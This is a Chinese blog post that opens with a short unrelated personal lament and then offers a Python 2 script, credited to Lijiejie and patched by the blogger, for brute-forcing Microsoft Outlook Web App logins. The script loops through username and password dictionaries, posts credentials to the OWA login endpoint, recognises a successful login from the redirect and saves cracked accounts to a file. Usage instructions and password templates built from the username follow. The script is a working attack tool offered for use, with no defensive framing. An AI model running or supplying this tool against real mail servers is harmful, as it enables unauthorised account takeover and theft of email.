活了二十几年,从来没有人给过我一次意外感动或惊喜,也没有人在我生日的时候给过我特别的礼物,生病的时候得到的只是一些不在身边的语言安慰,也不见谁真正的照顾过自己,甚至有的时候自己蒙头睡一觉就好了,也有人喜欢过我,但是从没见谁坚持过。
原创是Lijiejie,2014年写的,代码写的好差。修改了一下,勉强可以用了、
# Encoding=utf-8
# Outlook.py
import argparse
import httplib
import urllib
import time
import ssl
#ssl._create_default_https_context = ssl._create_unverified_context
parser = argparse.ArgumentParser(description='Microsoft OutLook WebAPP Brute Forcer.')
parser.add_argument('domain', type=str, help='website domain name, e.g. email.baidu.com')
parser.add_argument('users', type=str, help='username dict file path, e.g. users.txt')
parser.add_argument('passwords', type=str, help='passwords dict file path, e.g. passwords.dic')
args = parser.parse_args()
users = []
with open(args.users) as inFile:
while True:
user = inFile.readline().strip()
if len(user) == 0: break
users.append(user)
passwords = []
with open(args.passwords) as inFile:
while True:
pwd = inFile.readline().strip()
if len(pwd) == 0: break
passwords.append(pwd)
headers = {
'Accept': '*/*',
'Referer': 'https://' + args.domain + '/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f' + args.domain + '%2fowa%2f',
'Accept-Language': 'zh-CN',
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; ',
'Connection': 'Keep-Alive',
'Cache-Control': 'no-cache',
'Cookie': '',
}
for user in users:
for pwd in passwords:
pwd = pwd.replace('<user>', user)
print 'testing', user, ' -- ', pwd
res={}
tryt=1
while True and tryt > 0:
try:
conn = httplib.HTTPSConnection(args.domain)
conn.request(method='GET', url='/owa/')
res = dict(conn.getresponse().getheaders())
conn.close()
break
except Exception, e:
tryt -= 1
print e
print '!!!Error occured #1'
break
session=''
if res.has_key('Set-Cookie'):
session = res['set-cookie'].split(';')[0] # Get Session ID
headers2 = headers
headers2['Cookie'] = 'OutlookSession=%s ; PBack=0' % session
data = {'destination': 'https://%s/owa/' % args.domain,
'flags': '0', 'forcedownlevel': '0', 'trusted':'0',
'username':user, 'password':pwd,
'isUtf8':'1', 'Cookie': 'OutlookSession=%s; PBack=0' % session}
tryt = 3
url='reason='
while True and tryt > 0:
try:
conn = httplib.HTTPSConnection(args.domain)
conn.request(method='POST', url='/owa/auth.owa', body=urllib.urlencode(data), headers=headers2)
url = dict(conn.getresponse().getheaders())['location']
conn.close()
break
except Exception, e:
tryt -= 1
print e
print '!!!Error occured #2'
if url.find('reason=') < 0:
print '(SUCESS)>> User:', user, 'Password:', pwd
with open('cracked_email.txt', 'a') as outFile:
outFile.write(user + ' ' + pwd + '\n')
使用方法:Outlook.py mail.xxx.cn user.txt pass.txt
pass.txt中可以引用user字段方式:
<user>123
<user>123456
© Sh4dow's Blog | Powered by LOFTER